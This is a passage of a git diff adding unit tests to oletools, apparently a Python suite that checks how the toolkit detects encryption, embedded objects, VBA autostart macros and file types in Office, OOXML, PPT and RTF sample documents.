+from os.path import join
+
+from oletools import oleid
+
+class TestEncryptedDocumentDetection(unittest.TestCase):
+ def test_encrypted_document_detection(self):
+ """ Run oleid and check if the document is flagged as encrypted """
+ filename = join(DATA_BASE_DIR, 'basic/encrypted.docx')
+
+ oleid_instance = oleid.OleID(filename)
+ indicators = oleid_instance.check()
+
+ is_encrypted = next(i.value for i in indicators if i.id == 'encrypted')
+
+ self.assertEqual(is_encrypted, True)
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+ unittest.main()
\ No newline at end of file
diff --git a/tests/oleobj/__init__.py b/tests/oleobj/__init__.py
new file mode 100644
index 00000000..e69de29b
diff --git a/tests/oleobj/test_basic.py b/tests/oleobj/test_basic.py
new file mode 100644
index 00000000..f2c2a8f3
--- /dev/null
+++ b/tests/oleobj/test_basic.py
@@ -0,0 +1,164 @@
+""" Test oleobj basic functionality """
+
+import unittest
+from tempfile import mkdtemp
+from shutil import rmtree
+from os.path import join, isfile
+from hashlib import md5
+from glob import glob
+
+# Directory with test data, independent of current working directory
+from tests.test_utils import DATA_BASE_DIR, call_and_capture
+from oletools import oleobj
+from oletools.common.io_encoding import ensure_stdout_handles_unicode
+
+
+#: provide some more info to find errors
+DEBUG = False
+
+
+# test samples in test-data/oleobj: filename, embedded file name, embedded md5
+SAMPLES = (
+ ('sample_with_calc_embedded.doc', 'calc.exe',
+ '40e85286357723f326980a3b30f84e4f'),
+ ('sample_with_lnk_file.doc', 'calc.lnk',
+ '6aedb1a876d4ad5236f1fbbbeb7274f3'),
+ ('sample_with_lnk_file.pps', 'calc.lnk',
+ '6aedb1a876d4ad5236f1fbbbeb7274f3'),
+ ('sample_with_lnk_file.ppt', 'calc.lnk',
+ '6aedb1a876d4ad5236f1fbbbeb7274f3'),
+ ('embedded-unicode.doc', '_nic_de-___________.txt',
+ '264397735b6f09039ba0adf0dc9fb942'),
+ ('embedded-unicode-2007.docx', '_nic_de-___________.txt',
+ '264397735b6f09039ba0adf0dc9fb942'),
+)
+SAMPLES += tuple(
+ ('embedded-simple-2007.' + extn, 'simple-text-file.txt',
+ 'bd5c063a5a43f67b3c50dc7b0f1195af')
+ for extn in ('doc', 'dot', 'docx', 'docm', 'dotx', 'dotm')
+)
+SAMPLES += tuple(
+ ('embedded-simple-2007.' + extn, 'simple-text-file.txt',
+ 'ab8c65e4c0fc51739aa66ca5888265b4')
+ for extn in ('xls', 'xlsx', 'xlsb', 'xlsm', 'xla', 'xlam', 'xlt', 'xltm',
+ 'xltx', 'ppt', 'pptx', 'pptm', 'pps', 'ppsx', 'ppsm', 'pot',
+ 'potx', 'potm', 'ods', 'odp')
+)
+SAMPLES += (('embedded-simple-2007.odt', 'simple-text-file.txt',
+ 'bd5c063a5a43f67b3c50dc7b0f1195af'), )
+
+
+def calc_md5(filename):
+ """ calc md5sum of given file in temp_dir """
+ chunk_size = 4096
+ hasher = md5()
+ with open(filename, 'rb') as handle:
+ buf = handle.read(chunk_size)
+ while buf:
+ hasher.update(buf)
+ buf = handle.read(chunk_size)
+ return hasher.hexdigest()
+
+
+def preread_file(args):
+ """helper for TestOleObj.test_non_streamed: preread + call process_file"""
+ ensure_stdout_handles_unicode() # usually, main() call this
+ ignore_arg, output_dir, filename = args
+ if ignore_arg != '-d':
+ raise ValueError('ignore_arg not as expected!')
+ with open(filename, 'rb') as file_handle:
+ data = file_handle.read()
+ err_stream, err_dumping, did_dump = \
+ oleobj.process_file(filename, data, output_dir=output_dir)
+ if did_dump and not err_stream and not err_dumping:
+ return oleobj.RETURN_DID_DUMP
+ else:
+ return oleobj.RETURN_NO_DUMP # just anything else
+
+
+class TestOleObj(unittest.TestCase):
+ """ Tests oleobj basic feature """
+
+ def setUp(self):
+ """ fixture start: create temp dir """
+ self.temp_dir = mkdtemp(prefix='oletools-oleobj-')
+ self.did_fail = False
+
+ def tearDown(self):
+ """ fixture end: remove temp dir """
+ if self.did_fail and DEBUG:
+ print('leaving temp dir {0} for inspection'.format(self.temp_dir))
+ elif self.temp_dir:
+ rmtree(self.temp_dir)
+
+ def test_md5(self):
+ """ test all files in oleobj test dir """
+ self.do_test_md5(['-d', self.temp_dir])
+
+ def test_md5_args(self):
+ """
+ test that oleobj can be called with -i and -v
+
+ This is how ripOLE used to be often called (e.g. by amavisd-new);
+ ensure oleobj is a compatible replacement.
+ """
+ self.do_test_md5(['-d', self.temp_dir, '-v', '-i'])
+
+ def test_no_output(self):
+ """ test that oleobj does not find data where it should not """
+ args = ['-d', self.temp_dir]
+ for sample_name in ('sample_with_lnk_to_calc.doc',
+ 'embedded-simple-2007.xml',
+ 'embedded-simple-2007-as2003.xml'):
+ full_name = join(DATA_BASE_DIR, 'oleobj', sample_name)
+ output, ret_val = call_and_capture('oleobj', args + [full_name, ],
+ accept_nonzero_exit=True)
+ if glob(self.temp_dir + 'ole-object-*'):
+ self.fail('found embedded data in {0}. Output:\n{1}'
+ .format(sample_name, output))
+ self.assertEqual(ret_val, oleobj.RETURN_NO_DUMP,
+ msg='Wrong return value {} for {}. Output:\n{}'
+ .format(ret_val, sample_name, output))
+
+ def do_test_md5(self, args, test_fun=None, only_run_every=1):
+ """ helper for test_md5 and test_md5_args """
+ data_dir = join(DATA_BASE_DIR, 'oleobj')
+
+ # name of sample, extension of embedded file, md5 hash of embedded file
+ for sample_index, (sample_name, embedded_name, expect_hash) \
+ in enumerate(SAMPLES):
+ if sample_index % only_run_every != 0:
+ continue
+ args_with_path = args + [join(data_dir, sample_name), ]
+ if test_fun is None:
+ output, ret_val = call_and_capture('oleobj', args_with_path,
+ accept_nonzero_exit=True)
+ else:
+ ret_val = test_fun(args_with_path)
+ output = '[output: see above]'
+ self.assertEqual(ret_val, oleobj.RETURN_DID_DUMP,
+ msg='Wrong return value {} for {}. Output:\n{}'
+ .format(ret_val, sample_name, output))
+ expect_name = join(self.temp_dir,
+ sample_name + '_' + embedded_name)
+ if not isfile(expect_name):
+ self.did_fail = True
+ self.fail('{0} not created from {1}. Output:\n{2}'
+ .format(expect_name, sample_name, output))
+ continue
+ md5_hash = calc_md5(expect_name)
+ if md5_hash != expect_hash:
+ self.did_fail = True
+ self.fail('Wrong md5 {0} of {1} from {2}. Output:\n{3}'
+ .format(md5_hash, expect_name, sample_name, output))
+ continue
+
+ def test_non_streamed(self):
+ """ Ensure old oleobj behaviour still works: pre-read whole file """
+ return self.do_test_md5(['-d', self.temp_dir], test_fun=preread_file,
+ only_run_every=4)
+
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/oleobj/test_external_links.py b/tests/oleobj/test_external_links.py
new file mode 100644
index 00000000..2b7fc5bf
--- /dev/null
+++ b/tests/oleobj/test_external_links.py
@@ -0,0 +1,34 @@
+""" Test that oleobj detects external links in relationships files.
+"""
+
+import unittest
+import os
+from os import path
+
+# Directory with test data, independent of current working directory
+from tests.test_utils import DATA_BASE_DIR, call_and_capture
+from oletools import oleobj
+
+BASE_DIR = path.join(DATA_BASE_DIR, 'oleobj', 'external_link')
+
+
+class TestExternalLinks(unittest.TestCase):
+ def test_external_links(self):
+ """
+ loop through sample files asserting that external links are found
+ """
+
+ for dirpath, _, filenames in os.walk(BASE_DIR):
+ for filename in filenames:
+ file_path = path.join(dirpath, filename)
+
+ output, ret_val = call_and_capture('oleobj', [file_path, ],
+ accept_nonzero_exit=True)
+ self.assertEqual(ret_val, oleobj.RETURN_DID_DUMP,
+ msg='Wrong return value {} for {}. Output:\n{}'
+ .format(ret_val, filename, output))
+
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/olevba/__init__.py b/tests/olevba/__init__.py
new file mode 100644
index 00000000..e69de29b
diff --git a/tests/olevba/test_basic.py b/tests/olevba/test_basic.py
new file mode 100644
index 00000000..ef5ed268
--- /dev/null
+++ b/tests/olevba/test_basic.py
@@ -0,0 +1,109 @@
+"""
+Test basic functionality of olevba[3]
+"""
+
+import unittest
+import os
+from os.path import join
+import re
+
+# Directory with test data, independent of current working directory
+from tests.test_utils import DATA_BASE_DIR, call_and_capture
+
+
+class TestOlevbaBasic(unittest.TestCase):
+ """Tests olevba basic functionality"""
+
+ def test_text_behaviour(self):
+ """Test behaviour of olevba when presented with pure text file."""
+ self.do_test_behaviour('text')
+
+ def test_empty_behaviour(self):
+ """Test behaviour of olevba when presented with pure text file."""
+ self.do_test_behaviour('empty')
+
+ def do_test_behaviour(self, filename):
+ """Helper for test_{text,empty}_behaviour."""
+ input_file = join(DATA_BASE_DIR, 'basic', filename)
+ output, _ = call_and_capture('olevba', args=(input_file, ))
+
+ # check output
+ self.assertTrue(re.search(r'^Type:\s+Text\s*$', output, re.MULTILINE),
+ msg='"Type: Text" not found in output:\n' + output)
+ self.assertTrue(re.search(r'^No suspicious .+ found.$', output,
+ re.MULTILINE),
+ msg='"No suspicous...found" not found in output:\n' + \
+ output)
+ self.assertNotIn('error', output.lower())
+
+ # check warnings
+ for line in output.splitlines():
+ if line.startswith('WARNING ') and 'encrypted' in line:
+ continue # encryption warnings are ok
+ elif 'warn' in line.lower():
+ raise self.fail('Found "warn" in output line: "{}"'
+ .format(line.rstrip()))
+ # TODO: I disabled this test because we do not log "not encrypted" as warning anymore
+ # to avoid other issues.
+ # If we really want to test this, then the test should be run with log level INFO:
+ # self.assertIn('not encrypted', output)
+
+ def test_rtf_behaviour(self):
+ """Test behaviour of olevba when presented with an rtf file."""
+ input_file = join(DATA_BASE_DIR, 'msodde', 'RTF-Spec-1.7.rtf')
+ output, ret_code = call_and_capture('olevba', args=(input_file, ),
+ accept_nonzero_exit=True)
+
+ # check that return code is olevba.RETURN_OPEN_ERROR
+ self.assertEqual(ret_code, 5)
+
+ # check output:
+ self.assertIn('FileOpenError', output)
+ self.assertIn('is RTF', output)
+ self.assertIn('rtfobj', output)
+ # TODO: I disabled this test because we do not log "not encrypted" as warning anymore
+ # to avoid other issues.
+ # If we really want to test this, then the test should be run with log level INFO:
+ # self.assertIn('not encrypted', output)
+
+ # check warnings
+ for line in output.splitlines():
+ if line.startswith('WARNING ') and 'encrypted' in line:
+ continue # encryption warnings are ok
+ elif 'warn' in line.lower():
+ raise self.fail('Found "warn" in output line: "{}"'
+ .format(line.rstrip()))
+
+ def test_crypt_return(self):
+ """
+ Tests that encrypted files give a certain return code.
+
+ Currently, only the encryption applied by Office 2010 (CryptoApi RC4
+ Encryption) is tested.
+ """
+ CRYPT_DIR = join(DATA_BASE_DIR, 'encrypted')
+ CRYPT_RETURN_CODE = 9
+ ADD_ARGS = [], ['-d', ], ['-a', ], ['-j', ], ['-t', ]
+ EXCEPTIONS = ['autostart-encrypt-standardpassword.xls', # These ...
+ 'autostart-encrypt-standardpassword.xlsm', # files ...
+ 'autostart-encrypt-standardpassword.xlsb', # are ...
+ 'dde-test-encrypt-standardpassword.xls', # automati...
+ 'dde-test-encrypt-standardpassword.xlsx', # ...cally...
+ 'dde-test-encrypt-standardpassword.xlsm', # decrypted.
+ 'dde-test-encrypt-standardpassword.xlsb']
+ for filename in os.listdir(CRYPT_DIR):
+ if filename in EXCEPTIONS:
+ continue
+ full_name = join(CRYPT_DIR, filename)
+ for args in ADD_ARGS:
+ _, ret_code = call_and_capture('olevba',
+ args=[full_name, ] + args,
+ accept_nonzero_exit=True)
+ self.assertEqual(ret_code, CRYPT_RETURN_CODE,
+ msg='Wrong return code {} for args {}'\
+ .format(ret_code, args + [filename, ]))
+
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/olevba/test_crypto.py b/tests/olevba/test_crypto.py
new file mode 100644
index 00000000..aad78df3
--- /dev/null
+++ b/tests/olevba/test_crypto.py
@@ -0,0 +1,66 @@
+"""Check decryption of files from olevba works."""
+
+import sys
+import unittest
+from os.path import basename, join as pjoin
+import json
+from collections import OrderedDict
+
+from tests.test_utils import DATA_BASE_DIR, call_and_capture
+
+from oletools import crypto
+
+
+@unittest.skipIf(not crypto.check_msoffcrypto(),
+ 'Module msoffcrypto not installed for {}'
+ .format(basename(sys.executable)))
+class OlevbaCryptoWriteProtectTest(unittest.TestCase):
+ """
+ Test documents that are 'write-protected' through encryption.
+
+ Excel has a way to 'write-protect' documents by encrypting them with a
+ hard-coded standard password. When looking at the file-structure you see
+ an OLE-file with streams `EncryptedPackage`, `StrongEncryptionSpace`, and
+ `EncryptionInfo`. Contained in the first is the actual file. When opening
+ such a file in excel, it is decrypted without the user noticing.
+
+ Olevba should detect such encryption, try to decrypt with the standard
+ password and look for VBA code in the decrypted file.
+
+ All these tests are skipped if the module `msoffcrypto-tools` is not
+ installed.
+ """
+ def test_autostart(self):
+ """Check that autostart macro is found in xls[mb] sample file."""
+ for suffix in 'xlsm', 'xlsb':
+ example_file = pjoin(
+ DATA_BASE_DIR, 'encrypted',
+ 'autostart-encrypt-standardpassword.' + suffix)
+ output, _ = call_and_capture('olevba', args=('-j', example_file),
+ exclude_stderr=True)
+ data = json.loads(output, object_pairs_hook=OrderedDict)
+ # debug: json.dump(data, sys.stdout, indent=4)
+ self.assertEqual(len(data), 4)
+ self.assertIn('script_name', data[0])
+ self.assertIn('version', data[0])
+ self.assertEqual(data[0]['type'], 'MetaInformation')
+ self.assertIn('return_code', data[-1])
+ self.assertEqual(data[-1]['type'], 'MetaInformation')
+ self.assertEqual(data[1]['container'], None)
+ self.assertEqual(data[1]['file'], example_file)
+ self.assertEqual(data[1]['analysis'], None)
+ self.assertEqual(data[1]['macros'], [])
+ self.assertEqual(data[1]['type'], 'OLE')
+ self.assertEqual(data[2]['container'], example_file)
+ self.assertNotEqual(data[2]['file'], example_file)
+ self.assertEqual(data[2]['type'], "OpenXML")
+ analysis = data[2]['analysis']
+ self.assertEqual(analysis[0]['type'], 'AutoExec')
+ self.assertEqual(analysis[0]['keyword'], 'Auto_Open')
+ macros = data[2]['macros']
+ self.assertEqual(macros[0]['vba_filename'], 'Modul1.bas')
+ self.assertIn('Sub Auto_Open()', macros[0]['code'])
+
+
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/ooxml/__init__.py b/tests/ooxml/__init__.py
new file mode 100644
index 00000000..e69de29b
diff --git a/tests/ooxml/test_basic.py b/tests/ooxml/test_basic.py
new file mode 100644
index 00000000..e4f57607
--- /dev/null
+++ b/tests/ooxml/test_basic.py
@@ -0,0 +1,154 @@
+""" Basic tests for ooxml.py """
+
+import unittest
+
+import os
+from os.path import join, splitext
+from tests.test_utils import DATA_BASE_DIR
+from olefile import isOleFile
+from oletools import ooxml
+import logging
+
+
+class TestOOXML(unittest.TestCase):
+ """ Tests correct behaviour of XML parser """
+
+ DO_DEBUG = False
+
+ def setUp(self):
+ if self.DO_DEBUG:
+ logging.basicConfig(level=logging.DEBUG)
+
+
+ def test_rough_doctype(self):
+ """Checks all samples, expect either ole files or good ooxml output"""
+ # map from extension to expected doctype
+ ext2doc = dict(
+ docx=ooxml.DOCTYPE_WORD, docm=ooxml.DOCTYPE_WORD,
+ dotx=ooxml.DOCTYPE_WORD, dotm=ooxml.DOCTYPE_WORD,
+ xml=(ooxml.DOCTYPE_EXCEL_XML, ooxml.DOCTYPE_WORD_XML),
+ xlsx=ooxml.DOCTYPE_EXCEL, xlsm=ooxml.DOCTYPE_EXCEL,
+ xlsb=ooxml.DOCTYPE_EXCEL, xlam=ooxml.DOCTYPE_EXCEL,
+ xltx=ooxml.DOCTYPE_EXCEL, xltm=ooxml.DOCTYPE_EXCEL,
+ pptx=ooxml.DOCTYPE_POWERPOINT, pptm=ooxml.DOCTYPE_POWERPOINT,
+ ppsx=ooxml.DOCTYPE_POWERPOINT, ppsm=ooxml.DOCTYPE_POWERPOINT,
+ potx=ooxml.DOCTYPE_POWERPOINT, potm=ooxml.DOCTYPE_POWERPOINT,
+ ods=ooxml.DOCTYPE_NONE, odt=ooxml.DOCTYPE_NONE,
+ odp=ooxml.DOCTYPE_NONE,
+ )
+
+ # files that are neither OLE nor xml:
+ except_files = 'empty', 'text'
+ except_extns = 'rtf', 'csv', 'zip'
+
+ # analyse all files in data dir
+ for base_dir, _, files in os.walk(DATA_BASE_DIR):
+ for filename in files:
+ if filename in except_files:
+ if self.DO_DEBUG:
+ print('skip file: ' + filename)
+ continue
+ extn = splitext(filename)[1]
+ if extn:
+ extn = extn[1:] # remove the dot
+ if extn in except_extns:
+ if self.DO_DEBUG:
+ print('skip extn: ' + filename)
+ continue
+
+ full_name = join(base_dir, filename)
+ if isOleFile(full_name):
+ if self.DO_DEBUG:
+ print('skip ole: ' + filename)
+ continue
+ acceptable = ext2doc[extn]
+ if not isinstance(acceptable, tuple):
+ acceptable = (acceptable, )
+ try:
+ doctype = ooxml.get_type(full_name)
+ except Exception:
+ self.fail('Failed to get doctype of {0}'.format(filename))
+ self.assertTrue(doctype in acceptable,
+ msg='Doctype "{0}" for {1} not acceptable'
+ .format(doctype, full_name))
+ if self.DO_DEBUG:
+ print('ok: {0} --> {1}'.format(filename, doctype))
+
+ def test_iter_all(self):
+ """ test iter_xml without args """
+ expect_subfiles = dict([
+ ('[Content_Types].xml', 11),
+ ('_rels/.rels', 4),
+ ('word/_rels/document.xml.rels', 6),
+ ('word/document.xml', 102),
+ ('word/theme/theme1.xml', 227),
+ ('word/settings.xml', 40),
+ ('word/fontTable.xml', 25),
+ ('word/webSettings.xml', 3),
+ ('docProps/app.xml', 26),
+ ('docProps/core.xml', 10),
+ ('word/styles.xml', 441),
+ ])
+ n_elems = 0
+ testfile = join(DATA_BASE_DIR, 'msodde', 'harmless-clean.docx')
+ for subfile, elem, depth in ooxml.XmlParser(testfile).iter_xml():
+ n_elems += 1
+ if depth > 0:
+ continue
+
+ # now depth == 0; should occur once at end of every subfile
+ if subfile not in expect_subfiles:
+ self.fail('Subfile {0} not expected'.format(subfile))
+ self.assertEqual(n_elems, expect_subfiles[subfile],
+ 'wrong number of elems ({0}) yielded from {1}'
+ .format(n_elems, subfile))
+ _ = expect_subfiles.pop(subfile)
+ n_elems = 0
+
+ self.assertEqual(len(expect_subfiles), 0,
+ 'Forgot to iterate through subfile(s) {0}'
+ .format(expect_subfiles.keys()))
+
+ def test_iter_subfiles(self):
+ """ test that limitation on few subfiles works """
+ testfile = join(DATA_BASE_DIR, 'msodde', 'dde-test.xlsx')
+ subfiles = ['xl/theme/theme1.xml', 'docProps/app.xml']
+ parser = ooxml.XmlParser(testfile)
+ for subfile, elem, depth in parser.iter_xml(subfiles):
+ if self.DO_DEBUG:
+ print(u'{0} {1}{2}'.format(subfile, ' '*depth,
+ ooxml.debug_str(elem)))
+ if subfile not in subfiles:
+ self.fail('should have been skipped: {0}'.format(subfile))
+ if depth == 0:
+ subfiles.remove(subfile)
+
+ self.assertEqual(subfiles, [], 'missed subfile(s) {0}'
+ .format(subfiles))
+
+ def test_iter_tags(self):
+ """ test that limitation to tags works """
+ testfile = join(DATA_BASE_DIR, 'msodde', 'harmless-clean.docm')
+ nmspc = 'http://schemas.openxmlformats.org/wordprocessingml/2006/main'
+ tag = '{' + nmspc + '}p'
+
+ parser = ooxml.XmlParser(testfile)
+ n_found = 0
+ for subfile, elem, depth in parser.iter_xml(tags=tag):
+ n_found += 1
+ self.assertEqual(elem.tag, tag)
+
+ # also check that children are present
+ n_children = 0
+ for child in elem:
+ n_children += 1
+ self.assertFalse(child.tag == '')
+ self.assertTrue(n_children > 0, 'no children for elem {0}'
+ .format(ooxml.debug_str(elem)))
+
+ self.assertEqual(n_found, 7)
+
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/ooxml/test_zip_sub_file.py b/tests/ooxml/test_zip_sub_file.py
new file mode 100644
index 00000000..6e6085b2
--- /dev/null
+++ b/tests/ooxml/test_zip_sub_file.py
@@ -0,0 +1,167 @@
+""" Test ZipSubFile
+
+Checks that ZipSubFile behaves just like a regular file-like object, just with
+a few less allowed operations.
+"""
+
+import unittest
+from tempfile import mkstemp, TemporaryFile
+import os
+from zipfile import ZipFile
+
+from oletools.ooxml import ZipSubFile
+
+
+# flag to get more output to facilitate search for errors
+DEBUG = False
+
+# name of a temporary .zip file on the system
+ZIP_TEMP_FILE = ''
+
+# name of a file inside the temporary zip file
+FILE_NAME = 'test.txt'
+
+# contents of that file
+FILE_CONTENTS = b'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
+
+
+def setUpModule():
+ """ Called once before the first test; creates a temp zip file """
+ global ZIP_TEMP_FILE
+ handle, ZIP_TEMP_FILE = mkstemp(suffix='.zip',
+ prefix='oletools-test-ZipSubFile-')
+ os.close(handle)
+
+ with ZipFile(ZIP_TEMP_FILE, 'w') as writer:
+ writer.writestr(FILE_NAME, FILE_CONTENTS)
+ if DEBUG:
+ print('Created zip file ' + ZIP_TEMP_FILE)
+
+
+def tearDownModule():
+ """ Called once after last test; removes the temp zip file """
+ if ZIP_TEMP_FILE and os.path.isfile(ZIP_TEMP_FILE):
+ if DEBUG:
+ print('leaving temp zip file {0} for inspection'
+ .format(ZIP_TEMP_FILE))
+ else:
+ os.unlink(ZIP_TEMP_FILE)
+ elif DEBUG:
+ print('WARNING: zip temp file apparently not created')
+
+
+class TestZipSubFile(unittest.TestCase):
+ """ Tests ZipSubFile """
+
+ def setUp(self):
+ self.zipper = ZipFile(ZIP_TEMP_FILE)
+ self.subfile = ZipSubFile(self.zipper, FILE_NAME)
+ self.subfile.open()
+
+ # create a file in memory for comparison
+ self.compare = TemporaryFile(prefix='oletools-test-ZipSubFile-',
+ suffix='.bin')
+ self.compare.write(FILE_CONTENTS)
+ self.compare.seek(0) # re-position to start
+
+ self.assertEqual(self.subfile.tell(), 0)
+ self.assertEqual(self.compare.tell(), 0)
+ if DEBUG:
+ print('created comparison file {0!r} in memory'
+ .format(self.compare.name))
+
+ def tearDown(self):
+ self.compare.close()
+ self.subfile.close()
+ self.zipper.close()
+ if DEBUG:
+ print('\nall files closed')
+
+ def test_read(self):
+ """ test reading """
+ # read from start
+ self.assertEqual(self.subfile.read(4), self.compare.read(4))
+ self.assertEqual(self.subfile.tell(), self.compare.tell())
+
+ # read a bit more
+ self.assertEqual(self.subfile.read(4), self.compare.read(4))
+ self.assertEqual(self.subfile.tell(), self.compare.tell())
+
+ # create difference
+ self.subfile.read(1)
+ self.assertNotEqual(self.subfile.read(4), self.compare.read(4))
+ self.compare.read(1)
+ self.assertEqual(self.subfile.tell(), self.compare.tell())
+
+ # read all the rest
+ self.assertEqual(self.subfile.read(), self.compare.read())
+ self.assertEqual(self.subfile.tell(), self.compare.tell())
+
+ def test_seek_forward(self):
+ """ test seeking forward """
+ self.subfile.seek(10)
+ self.compare.seek(10)
+ self.assertEqual(self.subfile.read(1), self.compare.read(1))
+ self.assertEqual(self.subfile.tell(), self.compare.tell())
+
+ # seek 2 forward
+ self.subfile.seek(2, os.SEEK_CUR)
+ self.compare.seek(2, os.SEEK_CUR)
+ self.assertEqual(self.subfile.read(1), self.compare.read(1))
+ self.assertEqual(self.subfile.tell(), self.compare.tell())
+
+ # seek backward (only implemented case: back to start)
+ self.subfile.seek(-self.subfile.tell(), os.SEEK_CUR)
+ self.compare.seek(-self.compare.tell(), os.SEEK_CUR)
+ self.assertEqual(self.subfile.read(1), self.compare.read(1))
+ self.assertEqual(self.subfile.tell(), self.compare.tell())
+
+ # seek to end
+ self.subfile.seek(0, os.SEEK_END)
+ self.compare.seek(0, os.SEEK_END)
+ self.assertEqual(self.subfile.tell(), self.compare.tell())
+
+ # seek back to start
+ self.subfile.seek(0)
+ self.compare.seek(0)
+ self.assertEqual(self.subfile.tell(), self.compare.tell())
+ self.assertEqual(self.subfile.tell(), 0)
+
+ def test_check_size(self):
+ """ test usual size check: seek to end, tell, seek to start """
+ # seek to end
+ self.subfile.seek(0, os.SEEK_END)
+ self.assertEqual(self.subfile.tell(), len(FILE_CONTENTS))
+
+ # seek back to start
+ self.subfile.seek(0)
+
+ # read first few bytes
+ self.assertEqual(self.subfile.read(10), FILE_CONTENTS[:10])
+
+ def test_error_read(self):
+ """ test correct behaviour if read beyond end (no exception) """
+ self.subfile.seek(0, os.SEEK_END)
+ self.compare.seek(0, os.SEEK_END)
+
+ self.assertEqual(self.compare.read(10), self.subfile.read(10))
+ self.assertEqual(self.compare.tell(), self.subfile.tell())
+
+ self.subfile.seek(0)
+ self.compare.seek(0)
+ self.subfile.seek(len(FILE_CONTENTS) - 1)
+ self.compare.seek(len(FILE_CONTENTS) - 1)
+ self.assertEqual(self.compare.read(10), self.subfile.read(10))
+ self.assertEqual(self.compare.tell(), self.subfile.tell())
+
+ def test_error_seek(self):
+ """ test correct behaviour if seek beyond end (no exception) """
+ self.subfile.seek(len(FILE_CONTENTS) + 10)
+ self.compare.seek(len(FILE_CONTENTS) + 10)
+ # subfile.tell() gives len(FILE_CONTENTS),
+ # compare.tell() gives len(FILE_CONTENTS) + 10,
+ #self.assertEqual(self.subfile.tell(), self.compare.tell())
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/ppt_parser/__init__.py b/tests/ppt_parser/__init__.py
new file mode 100644
index 00000000..e69de29b
diff --git a/tests/ppt_parser/test_basic.py b/tests/ppt_parser/test_basic.py
new file mode 100644
index 00000000..b6532570
--- /dev/null
+++ b/tests/ppt_parser/test_basic.py
@@ -0,0 +1,38 @@
+""" Test ppt_parser and ppt_record_parser """
+
+import unittest
+import os
+from os.path import join, splitext
+
+# Directory with test data, independent of current working directory
+from tests.test_utils import DATA_BASE_DIR
+
+from oletools import ppt_record_parser
+# ppt_parser not tested yet
+
+
+class TestBasic(unittest.TestCase):
+ """ test basic functionality of ppt parsing """
+
+ def test_is_ppt(self):
+ """ test ppt_record_parser.is_ppt(filename) """
+ exceptions = ['encrypted.ppt', ] # actually is ppt but embedded
+ for base_dir, _, files in os.walk(DATA_BASE_DIR):
+ for filename in files:
+ if filename in exceptions:
+ continue
+ full_name = join(base_dir, filename)
+ extn = splitext(filename)[1]
+ if extn in ('.ppt', '.pps', '.pot'):
+ self.assertTrue(ppt_record_parser.is_ppt(full_name),
+ msg='{0} not recognized as ppt file'
+ .format(full_name))
+ else:
+ self.assertFalse(ppt_record_parser.is_ppt(full_name),
+ msg='{0} erroneously recognized as ppt'
+ .format(full_name))
+
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/rtfobj/test_is_rtf.py b/tests/rtfobj/test_is_rtf.py
new file mode 100644
index 00000000..ff6f9275
--- /dev/null
+++ b/tests/rtfobj/test_is_rtf.py
@@ -0,0 +1,69 @@
+""" Test rtfobj.is_rtf """
+
+from __future__ import print_function
+
+import unittest
+from os.path import join
+from os import walk
+
+from oletools.rtfobj import is_rtf, RTF_MAGIC
+
+# Directory with test data, independent of current working directory
+from tests.test_utils import DATA_BASE_DIR
+
+
+class TestIsRtf(unittest.TestCase):
+ """ Tests rtfobj.is_rtf """
+
+ def test_bytearray(self):
+ """ test that is_rtf works with bytearray """
+ self.assertTrue(is_rtf(bytearray(RTF_MAGIC + b'asdfasdfasdfasdfasdf')))
+ self.assertFalse(is_rtf(bytearray(RTF_MAGIC.upper() + b'asdfasdasdff')))
+ self.assertFalse(is_rtf(bytearray(b'asdfasdfasdfasdfasdfasdfsdfsdfa')))
+
+ def test_bytes(self):
+ """ test that is_rtf works with bytearray """
+ self.assertTrue(is_rtf(RTF_MAGIC + b'asasdffdfasdfasdfasdfasdf', True))
+ self.assertFalse(is_rtf(RTF_MAGIC.upper() + b'asdffasdfasdasdff', True))
+ self.assertFalse(is_rtf(b'asdfasdfasdfasdfasdfasdasdfffsdfsdfa', True))
+
+ def test_tuple(self):
+ """ test that is_rtf works with byte tuples """
+ data = tuple(byte_char for byte_char in RTF_MAGIC + b'asdfasfadfdfsdf')
+ self.assertTrue(is_rtf(data))
+
+ data = tuple(byte_char for byte_char in RTF_MAGIC.upper() + b'asfasdf')
+ self.assertFalse(is_rtf(data))
+
+ data = tuple(byte_char for byte_char in b'asdfasfassdfsdsfeereasdfwdf')
+ self.assertFalse(is_rtf(data))
+
+ def test_iterable(self):
+ """ test that is_rtf works with byte iterables """
+ data = (byte_char for byte_char in RTF_MAGIC + b'asdfasfasasdfasdfddf')
+ self.assertTrue(is_rtf(data))
+
+ data = (byte_char for byte_char in RTF_MAGIC.upper() + b'asdfassfasdf')
+ self.assertFalse(is_rtf(data))
+
+ data = (byte_char for byte_char in b'asdfasfasasdfasdfasdfsdfdwerwedf')
+ self.assertFalse(is_rtf(data))
+
+ def test_files(self):
+ """ test on real files """
+ for base_dir, _, files in walk(DATA_BASE_DIR):
+ for filename in files:
+ full_path = join(base_dir, filename)
+ expect = filename.endswith('.rtf')
+ self.assertEqual(is_rtf(full_path), expect,
+ 'is_rtf({0}) did not return {1}'
+ .format(full_path, expect))
+ with open(full_path, 'rb') as handle:
+ self.assertEqual(is_rtf(handle), expect,
+ 'is_rtf(open({0})) did not return {1}'
+ .format(full_path, expect))
+
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/rtfobj/test_issue_185.py b/tests/rtfobj/test_issue_185.py
index cf8358eb..cbfc97f6 100644
--- a/tests/rtfobj/test_issue_185.py
+++ b/tests/rtfobj/test_issue_185.py
@@ -1,11 +1,11 @@
import unittest, sys, os
-from .. import testdata_reader
+from tests.test_utils import testdata_reader
from oletools import rtfobj
class TestRtfObjIssue185(unittest.TestCase):
def test_skip_space_after_bin_control_word(self):
- data = testdata_reader.read('rtfobj/issue_185.rtf')
+ data = testdata_reader.read_encrypted('rtfobj/issue_185.rtf.zip')
rtfp = rtfobj.RtfObjParser(data)
rtfp.parse()
objects = rtfp.objects
